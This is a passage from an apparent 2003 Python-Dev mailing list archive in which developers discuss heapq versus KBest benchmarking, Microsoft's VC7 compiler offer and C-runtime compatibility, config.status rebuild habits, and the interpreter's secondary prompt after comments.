But in *this* case I'm not sure that the only thing we're really measuring
isn't:

1. Whether an algorithm has an early-out gimmick.
2. How effective that early-out gimmick is.
and
3. How expensive it is to *try* the early-out gimmick.

The heapq method Rulz on random data because its answers then are "yes,
very, dirt cheap".  I wrote the KBest test like so:

def three(seq, N):
    NBest = KBest(N, -1e200)
    for x in seq:
        NBest.put(x)
    L = NBest.get()
    L.sort()
    return L

(the sort at the end is just so the results can be compared against the
other methods, to ensure they all get the same answer).  If I break into the
abstraction and change the test like so:

def three(seq, N):
    NBest = KBest(N, -1e200)
    cutoff = -1e200
    for x in seq:
        if x > cutoff:
            NBest.put(x)
            cutoff = NBest.cutoff
    L = NBest.get()
    L.sort()
    return L

then KBest is about 20% *faster* than heapq on random data.  Doing the
comparison inline avoids a method call when early-out pays, early-out pays
more and more as the sequence nears its end, and simply avoiding the method
call then makes the overall algorithm 3X faster.  So O() analysis may
triumph when equivalent low-level speed tricks are played (the heapq method
did its early-out test inline too), but get swamped before doing so.

> The other surprise is that (unlike, say, the sort or heapq versions)
> your KBest doesn't look significantly more concise than my earlier Java
> implementation.

The only thing I was trying to minimize was my time in whipping up something
correct to measure.  Still, I count 107 non-blank, non-comment lines of
Java, and 59 of Python.  Java gets unduly penalized for curly braces, Python
for tedious tricks like

        buf = self.buf
        k = self.k

to make locals for speed, and that I never put dependent code on the same
line as an "if" or "while" test (while you do).  Note that it's not quite
the same algorithm:  the Python version isn't restricted to ints, and in
particular doesn't assume it can do arithmetic on a key to get "the next
larger" key.  Instead it does 3-way partitioning to find the items equal to
the pivot.  The greater generality may make the Python a little windier.

BTW, the heapq code isn't really more compact than C, if you count the
implementation code in heapq.py too:  it's all low-level small-int
arithmetic and array indexing.  The only real advantage Python has over
assembler for code like that is that we can grow the list/heap dynamically
without any coding effort.



From martin@v.loewis.de  Wed May  7 06:21:46 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 07 May 2003 07:21:46 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>
Message-ID: <m3el3bwcut.fsf@mira.informatik.hu-berlin.de>

Tim Peters <tim.one@comcast.net> writes:

> There's no reason to believe that other code bases are immune from
> needing changes too.

OTOH, there is any reason to believe that for many of these packages,
the required changes have been made already, atleast for those that
get regular updates (Tcl/Tk, bsddb).

Regards,
Martin


From martin@v.loewis.de  Wed May  7 06:23:31 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 07 May 2003 07:23:31 +0200
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <usmrry006.fsf@boost-consulting.com>
References: <008601c31414$a26d0120$21795418@dell1700>
 <3EB82CF8.4030005@v.loewis.de> <usmrry006.fsf@boost-consulting.com>
Message-ID: <m3addzwcrw.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> They pretty much told you the exact score, through me.  More details
> are available if neccessary.

That is information about the core ABI. I do need to be concerned
about changes in the libraries, as well, in particular about
incompatibilities resulting from multiple copies of the C library. You
said you don't know much about that.

Regards,
Martin



From paoloinvernizzi@dmsware.com  Wed May  7 08:12:34 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Wed, 07 May 2003 09:12:34 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <03dc01c31424$26758500$530f8490@eden>
References: <03dc01c31424$26758500$530f8490@eden>
Message-ID: <3EB8B1E2.2050108@dmsware.com>

Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think the scons (www.scons.org) will have in its next release full 
support for building targets using VC6 *project* file, and full support 
for VC7.
Actually it has support also for cygwin and mingw...

So I think is possible to have an automated way for building VC7 python 
based only on some scons script and VC6 project files...
The possible goal is to keep working with VC6 IDE as now, and have a 
simple build script able to automatically build the VC7 version tracking 
changes..

I've inserted Greg Spencer, who I know is working on this... surely he 
can bring us more details.


---
Paolo Invernizzi.






From phil@riverbankcomputing.co.uk  Wed May  7 09:02:46 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 09:02:46 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>
Message-ID: <200305070902.46353.phil@riverbankcomputing.co.uk>

On Wednesday 07 May 2003 2:17 am, Tim Peters wrote:
> [Phil Thompson]
>
> > ...
> > If it's free, why pay any attention to the offer of a donation of a GUI
> > frontend? (With a certain amount of irony, I don't attach any
> > value to a GUI frontend to a compiler.)
>
> The GUI isn't just the compiler, it's also the automated dependency
> analysis, a make system, and a (very good) debugger.
>
> > If it is free using some Microsoft definition of the word (eg.
> > users have to upgrade to Win2K, or some other "read the small print"
> > reason) then my vote is -1.
>
> Guido asked who would want one.  You don't, but you don't get to vote that
> nobody else does either.

That's not the point I'm trying to make. If there is a cost to *users* of a 
change then that change must be managed properly. The statement on 
Microsoft's web page says...

"Non-developers need to install the .NET Framework 1.1 to run applications 
developed using the .NET Framework 1.1."

The impression I'm getting is that a quick switchover to VC 7 is being 
suggested - that's what I'm "voting" against.

Phil


From harri.pasanen@trema.com  Wed May  7 09:31:08 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Wed, 7 May 2003 10:31:08 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
Message-ID: <200305071031.08474.harri.pasanen@trema.com>

On Tuesday 06 May 2003 22:26, Martin v. L=F6wis wrote:
> Alex Martelli wrote:
> > When we discussed VC versions (back when we met in Ofxord during
> > PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> > are indeed compatible
>
> I doubt he said this in this generality: he surely knows that you
> cannot mix C++ objects files on the object file level between those
> compilers, as they implement completely different ABIs.
>
> For Python, the biggest problem is that you cannot pass FILE* from
> one C library to the other, because of some stupid locking test in
> the C library. This does cause crashes when you try to use Python
> extension modules compiled with the wrong compiler.
>

One known failure case from the real world is the OmniORB free CORBA=20
ORB.  The omniidl parser, which is implemented as a mixture of python=20
and C++ requires that python is compiled with the same VC version as=20
you are compiling OmniORB with.

So if you are using VC7 to compile OmniORB, you cannot use the binary=20
Python 2.2.2 from pythonlabs for it, you need to compile your own=20
python using VC7.  I believe it is the FILE * that is causing the=20
problem here.  If I recall correctly, the size of the underlying FILE=20
struct is different in msvcrt.dll and msvcrt7.dll.  I don't know the=20
gory details, I just know the cure.  This issue was also in omniORB=20
mailing list.

=46or our own product we have to support both VC6 and VC7.   For our=20
development version we have actually imported python 2.3 to our CVS,=20
and we are compiling it with VC7.1.  Our previous release continues=20
to rely on VC6, and Python 2.2.2, so each develeloper actually has=20
both VC6 and VC7.1 installed on their machine, and correspondingly=20
both python 2.2.2 and python 2.3.

Just another datapoint.

=2DHarri


From sjoerd@acm.org  Wed May  7 09:36:46 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Wed, 07 May 2003 10:36:46 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16056.2688.72423.251200@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org> <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
Message-ID: <20030507083646.6305F74230@indus.ins.cwi.nl>

On Tue, May 6 2003 Skip Montanaro wrote:

> 
>     >> This generated pyconfig.h.  It would thus appear that config.status
>     >> shouldn't be used by developers.  Apparently one of the other flags
>     >> it appends to the generated configure command suppresses generation
>     >> of pyconfig.h (and maybe other files).
> 
>     Martin> Can you find out whether this is related to the fact that you
>     Martin> are building in a separate build directory?
> 
> I just confirmed that it's not related to the separate build directory.
> When you run config.status --recheck it reruns your latest configure command
> with the extra flags --no-create and --no-recursion.  Without rummaging
> around in the configure file my guess is the --no-create flag is the
> culprit.  
> 
> So, a word to the wise: avoid config.status --recheck.

I don't agree.  Just run ./config.status without arguments after running
./config.status --recheck.  That *will* regenerate all files.

-- Sjoerd Mullender <sjoerd@acm.org>


From Paul.Moore@atosorigin.com  Wed May  7 11:49:36 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Wed, 7 May 2003 11:49:36 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com>

From: Guido van Rossum [mailto:guido@python.org]
> > If this means that those of us with VC6, and with no plans/reasons =
to
> > upgrade can no longer build our own extensions, this would be a
> > disaster.

> Part of the offer was:

> | Potentially we can even figure out how to enable anyone to
> | build Python using the freely downloadable compilers I mentioned
> | above...

Which is good news (don't get me wrong, I'm glad to see Microsoft
supporting open source projects in this way). But wouldn't that imply
unoptimised builds?

I just checked:

>cl /O2
Microsoft (R) 32-bit C/C++ Standard Compiler Version 13.00.9466 for =
80x86
Copyright (C) Microsoft Corporation 1984-2001. All rights reserved.

cl : Command line warning D4029 : optimization is not available in the
standard edition compiler

So, specifically, if PythonLabs releases Python 2.3 built with MSVC7,
and I want to build the latest version of PIL, (maybe because Fredrik
hasn't released a binary version yet), do I have no way of getting
an optimised build (I pick PIL deliberately, because I guess that image
processing would benefit from optimisation, and in the past, PIL =
binaries
have been relatively hard to obtain at times)?

That's the problem I see, personally. I have VC6 because my employer =
uses
Visual Studio for Visual Basic development. But VB has changed so much =
in
the transition to .NET, that I don't believe they will ever going to =
VS7.
So I will have to remain with VS6 (I'm never going to buy VS7 myself, =
just
for this sort of job).

Paul.


From mhammond@skippinet.com.au  Wed May  7 11:52:21 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 07 May 2003 20:52:21 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070902.46353.phil@riverbankcomputing.co.uk>
Message-ID: <046701c31486$bdac6170$530f8490@eden>

> "Non-developers need to install the .NET Framework 1.1 to run
> applications developed using the .NET Framework 1.1."

MSVC7 is not the .NET framework.  Let's just relax a little and have some
faith in the people making these decisions.

Mark.



From mhammond@skippinet.com.au  Wed May  7 11:55:48 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 20:55:48 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com>
Message-ID: <046a01c31487$399d3390$530f8490@eden>

This is a multi-part message in MIME format.

------=_NextPart_000_046B_01C314DB.0B494390
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

> That's the problem I see, personally. I have VC6 because my 
> employer uses Visual Studio for Visual Basic development. 
> But VB has changed so much in
> the transition to .NET, that I don't believe they will ever 
> going to VS7.  So I will have to remain with VS6 (I'm never 
> going to buy VS7 myself, just for this sort of job).

I must say that anecdotally, I find this to be true.  Developers are *not*
flocking to VC7.  I wonder if that fact has anything to do with MS offering
free compilers?

Maybe we could get 100 free versions out of them <wink>

Mark.


------=_NextPart_000_046B_01C314DB.0B494390
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="winmail.dat"

eJ8+IjMKAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEGgAMADgAAANMHBQAHABQANwAAAAMANAEB
A5AGALgGAAAlAAAACwACAAEAAAALACMAAAAAAAMAJgAAAAAACwApAAAAAAADAC4AAAAAAAMANgAA
AAAAHgBwAAEAAAAbAAAAW1B5dGhvbi1EZXZdIE1TIFZDIDcgb2ZmZXIAAAIBcQABAAAAFgAAAAHD
FIc3oS70lqaMukw1n+Kj0kqn7w8AAAIBHQwBAAAAHwAAAFNNVFA6TUhBTU1PTkRAU0tJUFBJTkVU
LkNPTS5BVQAACwABDgAAAABAAAYOANrXGocUwwECAQoOAQAAABgAAAAAAAAAccRAiYOwsk+IY+5m
qPea/wKHAAADABQOAQAAAAsAHw4BAAAAAgEJEAEAAAB2AgAAcgIAAHwDAABMWkZ1tVBoEAMACgBy
Y3BnMTI14jIDQ3RleAVBAQMB9/8KgAKkA+QHEwKAD/MAUARWPwhVB7IRJQ5RAwECAGNo4QrAc2V0
MgYABsMRJfYzBEYTtzASLBEzCO8J97Y7GB8OMDURIgxgYwBQMwsJAWQzNhZQC6YgPiQgVBPgdCcE
IHRoGGUgcANgAmBlbSBkSSAUEGUsHbAEkHNjAiAHQGx5Lh4xE+B2QR2gVkM2IGIFkGHidRQQIG15
CuMKgBzwcx4QC1BveRKBIGEEIFYNBAB1B0AGAHR1ZGmcbyACEAXAIjVCYQ3R7iABAB+wF7BwB4AC
MB9QySDWQnUFQFZCH4EEILkT0W5nCYAeUCLwbRrQnGggC4Eg5R2CdHIAchZ0IuADoHQi8C5ORV5U
HpAdgB0wHjFkAiAn+wVAICBsCJAfsR2BILAD8J8fICFAH7AK1CESZ28LgOJnKKJWUzcfUAYAIvD/
HkAq4x+TKLEYIADAC4Aq0UcdgCyBIAAoSSceIG7zKz8sQ2J1ILAskSCRFBD0bGYekGogYAVAIxId
gMcEACaRACAgb2YxwB3gfCkuINQg1B5AJtAx8XP+YSCwKUMAcAWQKbABkB8h+x6QHkBmC4AmgDJj
MKIn4nsKUCzBRCQ0HsE1MBggIDQqbjWQKiMAF7Bja/0sJkMssi0hAiAEgScQMxC9KUNmANAFQCXi
AHB5MmHfLDQpsC50BeEzAGYGcSwxbwNQCeAmEANwcAMQHsE/LTOKTTTANwF3PeJ1bOcmgCZgBUAx
MBZQPbMvgX8AkAIgBCAIYDLjHYEeIDyRA/Buaz4+rHJrM3sCfUSwAAAeAEIQAQAAAEgAAAA8MTZF
MTAxMEU0NTgxQjA0OUFCQzUxRDQ5NzVDRURCODg2MTlBNjRAVUtEQ1gwMDEudWsuaW50LmF0b3Nv
cmlnaW4uY29tPgADAAlZAQAAAAsAC4AIIAYAAAAAAMAAAAAAAABGAAAAAAOFAAAAAAAAAwAMgAgg
BgAAAAAAwAAAAAAAAEYAAAAAEIUAAAAAAAADAA2ACCAGAAAAAADAAAAAAAAARgAAAABShQAAfW4B
AB4ADoAIIAYAAAAAAMAAAAAAAABGAAAAAFSFAAABAAAABAAAADkuMAALABKACCAGAAAAAADAAAAA
AAAARgAAAAAOhQAAAAAAAAMAE4AIIAYAAAAAAMAAAAAAAABGAAAAABGFAAAAAAAAAwAUgAggBgAA
AAAAwAAAAAAAAEYAAAAAGIUAAAAAAAALABWACCAGAAAAAADAAAAAAAAARgAAAAAGhQAAAAAAAAMA
FoAIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAAAAAAAgH4DwEAAAAQAAAAccRAiYOwsk+IY+5mqPea
/wIB+g8BAAAAEAAAAHHEQImDsLJPiGPuZqj3mv8CAfsPAQAAAJIAAAAAAAAAOKG7EAXlEBqhuwgA
KypWwgAAbXNwc3QuZGxsAAAAAABOSVRB+b+4AQCqADfZbgAAAEU6XERvY3VtZW50cyBhbmQgU2V0
dGluZ3Ncc2tpcFxMb2NhbCBTZXR0aW5nc1xBcHBsaWNhdGlvbiBEYXRhXE1pY3Jvc29mdFxPdXRs
b29rXG91dGxvb2sucHN0AAAAAwD+DwUAAAADAA00/TcAAAIBfwABAAAAMQAAADAwMDAwMDAwNzFD
NDQwODk4M0IwQjI0Rjg4NjNFRTY2QThGNzlBRkY2NDE5RjkwMAAAAAADAAYQa9ilLgMABxCvAQAA
AwAQEAEAAAADABEQAQAAAB4ACBABAAAAZQAAAFRIQVRTVEhFUFJPQkxFTUlTRUUsUEVSU09OQUxM
WUlIQVZFVkM2QkVDQVVTRU1ZRU1QTE9ZRVJVU0VTVklTVUFMU1RVRElPRk9SVklTVUFMQkFTSUNE
RVZFTE9QTUVOVEJVVFYAAAAAC5I=

------=_NextPart_000_046B_01C314DB.0B494390--



From dave@boost-consulting.com  Wed May  7 12:06:22 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 07 May 2003 07:06:22 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <m3addzwcrw.fsf@mira.informatik.hu-berlin.de> (Martin v.
 =?iso-8859-15?q?L=F6wis's?= message of "07 May 2003 07:23:31 +0200")
References: <008601c31414$a26d0120$21795418@dell1700>
 <3EB82CF8.4030005@v.loewis.de> <usmrry006.fsf@boost-consulting.com>
 <m3addzwcrw.fsf@mira.informatik.hu-berlin.de>
Message-ID: <ud6ivxbgx.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. L=F6wis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> They pretty much told you the exact score, through me.  More details
>> are available if neccessary.
>
> That is information about the core ABI. I do need to be concerned
> about changes in the libraries, as well, in particular about
> incompatibilities resulting from multiple copies of the C library. You
> said you don't know much about that.

I can find out almost as easily, if you have specific questions.

Just let me know,
--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From mwh@python.net  Wed May  7 12:31:58 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 07 May 2003 12:31:58 +0100
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <16056.2688.72423.251200@montanaro.dyndns.org> (Skip
 Montanaro's message of "Tue, 6 May 2003 14:18:24 -0500")
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
Message-ID: <2m65on6lht.fsf@starship.python.net>

Skip Montanaro <skip@pobox.com> writes:

> So, a word to the wise: avoid config.status --recheck.

I don't know if I'm wise or not but I do tend to go for

 rm -rf build && mkdir build && cd build && ../configure -q && make -s

for most rebuilds... I guess I should trust my tools a bit more.

Cheers,
M.

-- 
  The meaning of "brunch" is as yet undefined.
                                             -- Simon Booth, ucam.chat


From skip@pobox.com  Wed May  7 12:42:21 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 06:42:21 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <2m65on6lht.fsf@starship.python.net>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
 <2m65on6lht.fsf@starship.python.net>
Message-ID: <16056.61725.602991.181703@montanaro.dyndns.org>

    >> So, a word to the wise: avoid config.status --recheck.

    Michael> I don't know if I'm wise or not but I do tend to go for

    Michael>  rm -rf build && mkdir build && cd build && ../configure -q && make -s

    Michael> for most rebuilds... I guess I should trust my tools a bit
    Michael> more.

I got in the habit of using config.status --recheck because it allowed me to
only remember a single configure-like command for most packages I
build/install using configure.  I only had to figure out what flags to pass
to configure once, then later typing "C-r rech" in bash was sufficient to
reconfigure the package.  It would be nice if config.status had a flag which
actually executed configure without the --no-create and --no-recursion
flags.

Someone mentioned invoking config.status without the --recheck flag.  I
don't think that's wise in a development environment since that doesn't
actually run configure.  Since we're talking about building Python in a
development environment, I find it hard to believe you'd want to skip
configure altogether.

Skip



From Jack.Jansen@cwi.nl  Wed May  7 14:08:44 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Wed, 7 May 2003 15:08:44 +0200
Subject: [Python-Dev] bsddb185 module changes checked in
In-Reply-To: <16056.8215.274307.904009@montanaro.dyndns.org>
Message-ID: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>

On Tuesday, May 6, 2003, at 22:50 Europe/Amsterdam, Skip Montanaro 
wrote:

>
> The various bits necessary to implement the "build bsddb185 when
> appropriate" have been checked in.  I'm pretty sure I don't have the 
> best
> possible test for the existence of a db library, but it will have to 
> do for
> now.  I suspect others can clean it up later during the beta cycle.  
> The
> current detection code in setup.py should work for Nick on OSF/1 and 
> for
> platforms which don't require a separate db library.
>
> I'd appreciate some extra pounding on this code.

On SGI Irix 6.5 (MIPSpro Compilers: Version 7.2.1) it tries to build it,
and fails. It complains about "u_int" and such not being defined. 
There's
magic at the top of /usr/include/db.h for defining various types 
optionally,
and that's as far as my understanding went.
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From andymac@bullseye.apana.org.au  Wed May  7 10:18:41 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Wed, 7 May 2003 20:18:41 +1100 (edt)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB853C8.70100@ghaering.de>
Message-ID: <Pine.OS2.4.44.0305072012010.198-100000@tenring.andymac.org>

On Wed, 7 May 2003, [ISO-8859-1] Gerhard H=E4ring wrote:

> OTOH I'm pretty sure that a mingw build would be much easier if I just
> wrote my own Makefiles, but that's probably unlikely to ever be merged.

I'm maintaining the EMX port in a subdirectory of the PC directory (in
CVS), and it is (basically) the way the MSVC build is being maintained -
if you consider Visual Studio project files as abstract makefiles.

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  | Snail: PO Box 370
        andymac@pcug.org.au            |        Belconnen  ACT  2616
Web:    http://www.andymac.org/        |        Australia



From duncan@rcp.co.uk  Wed May  7 14:30:14 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Wed, 7 May 2003 14:30:14 +0100
Subject: [Python-Dev] Microsoft speedup
Message-ID: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>

I was just playing around with the compiler options using Microsoft VC6 and 
I see that adding the option /Ob2 speeds up pystone by about 2.5%
(/Ob2 is the option to automatically inline functions where the compiler 
thinks it is worthwhile.)

The downside is that it increases the size of python23.dll by about 13%.

It's not a phenomenal speedup, but it should be pretty low impact if the 
extra size is considered a worthwhile tradeoff. I haven't checked yet with 
VC7, but the compiler options are the same so the effect should also be 
similar.

-- 
Duncan Booth                                             duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?


From sjoerd@acm.org  Wed May  7 15:14:19 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Wed, 07 May 2003 16:14:19 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16056.61725.602991.181703@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org> <m3znm06kl2.fsf@mira.informatik.hu-berlin.de> <16056.2688.72423.251200@montanaro.dyndns.org> <2m65on6lht.fsf@starship.python.net>
 <16056.61725.602991.181703@montanaro.dyndns.org>
Message-ID: <20030507141419.B87AA74230@indus.ins.cwi.nl>

On Wed, May 7 2003 Skip Montanaro wrote:

> 
>     >> So, a word to the wise: avoid config.status --recheck.
> 
>     Michael> I don't know if I'm wise or not but I do tend to go for
> 
>     Michael>  rm -rf build && mkdir build && cd build && ../configure -q && make -s
> 
>     Michael> for most rebuilds... I guess I should trust my tools a bit
>     Michael> more.
> 
> I got in the habit of using config.status --recheck because it allowed me to
> only remember a single configure-like command for most packages I
> build/install using configure.  I only had to figure out what flags to pass
> to configure once, then later typing "C-r rech" in bash was sufficient to
> reconfigure the package.  It would be nice if config.status had a flag which
> actually executed configure without the --no-create and --no-recursion
> flags.
> 
> Someone mentioned invoking config.status without the --recheck flag.  I
> don't think that's wise in a development environment since that doesn't
> actually run configure.  Since we're talking about building Python in a
> development environment, I find it hard to believe you'd want to skip
> configure altogether.

I mentioned that.  But I also said to do that after running with the
--recheck flag.

In fact, I use the bit

Makefile: Makefile.in config.h.in config.status
        ./config.status
config.status: configure
        ./config.status --recheck

in some of my makefiles.  I just type "make Makefile" and it does all it
needs to do.

-- Sjoerd Mullender <sjoerd@acm.org>


From skip@pobox.com  Wed May  7 15:24:46 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 09:24:46 -0500
Subject: [Python-Dev] odd interpreter feature
Message-ID: <16057.5934.556547.671279@montanaro.dyndns.org>

I was editing the tutorial just now and noticed the secondary prompt (...)
in a situation where I didn't think it was appropriate:

    >>> # The argument of repr() may be any Python object:
    ... repr(x, y, ('spam', 'eggs'))
    "(32.5, 40000, ('spam', 'eggs'))"

It's caused by the trailing colon at the end of the comment.  I verified it
using current CVS:

    >>> hello = 'hello, world\n' hellos = repr(hello) print hellos
    'hello, world\n'
    >>> # hello:
    ...
    >>>

Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

Skip


From mwh@python.net  Wed May  7 15:37:37 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 07 May 2003 15:37:37 +0100
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org> (Skip
 Montanaro's message of "Wed, 7 May 2003 09:24:46 -0500")
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <2mwuh26cwe.fsf@starship.python.net>

Skip Montanaro <skip@pobox.com> writes:

> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
>
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
>     "(32.5, 40000, ('spam', 'eggs'))"
>
> It's caused by the trailing colon at the end of the comment.

Python 2.3b1+ (#1, May  6 2003, 18:00:11) 
[GCC 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> # no it's not
... 

Cheers,
M.

-- 
  The Internet is full.  Go away.
                      -- http://www.disobey.com/devilshat/ds011101.htm


From amk@amk.ca  Wed May  7 15:35:39 2003
From: amk@amk.ca (A.M. Kuchling)
Date: Wed, 07 May 2003 10:35:39 -0400
Subject: [Python-Dev] Re: odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <b9b5h5$mhk$1@main.gmane.org>

Skip Montanaro wrote:
> It's caused by the trailing colon at the end of the comment. 

No, it's just the comment.

 >>> # hello
... print 'foo'
foo
 >>>

--amk




From tim.one@comcast.net  Wed May  7 15:42:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 07 May 2003 10:42:22 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>

[Skip Montanaro]
> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
>
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
>     "(32.5, 40000, ('spam', 'eggs'))"
>
> It's caused by the trailing colon at the end of the comment.  I
> verified it using current CVS:
>
>     >>> hello = 'hello, world\n' hellos = repr(hello) print hellos
>     'hello, world\n'
>     >>> # hello:
>     ...
>     >>>
>
> Shouldn't the trailing colon be ignored in comments?  Bug,
> feature or wart?

This changed at some very early point in Python's life.  I don't think the
trailing colon is relevant:

>>> 1+2
3
>>> # hello
...
>>>



From skip@pobox.com  Wed May  7 15:51:10 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 09:51:10 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <2mwuh26cwe.fsf@starship.python.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <2mwuh26cwe.fsf@starship.python.net>
Message-ID: <16057.7518.148868.168522@montanaro.dyndns.org>

    >>> # no it's not
    ... 

Damn, thanks...

I guess the question still remains though, should the secondary prompt be
issued after a comment?

Skip


From fdrake@acm.org  Wed May  7 15:55:45 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 7 May 2003 10:55:45 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net>
Message-ID: <16057.7793.975960.566995@grendel.zope.com>

Tim Peters writes:
 > This changed at some very early point in Python's life.  I don't think the
 > trailing colon is relevant:
 > 
 > >>> 1+2
 > 3
 > >>> # hello
 > ...
 > >>>

I think this is also a point on which Python and Jython differ, but I
don't have Jython installed anywhere nearby to test with.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From guido@python.org  Wed May  7 16:02:21 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:02:21 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: "Your message of Wed, 07 May 2003 09:24:46 CDT."
 <16057.5934.556547.671279@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
Message-ID: <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>

> I was editing the tutorial just now and noticed the secondary prompt (...)
> in a situation where I didn't think it was appropriate:
> 
>     >>> # The argument of repr() may be any Python object:
>     ... repr(x, y, ('spam', 'eggs'))
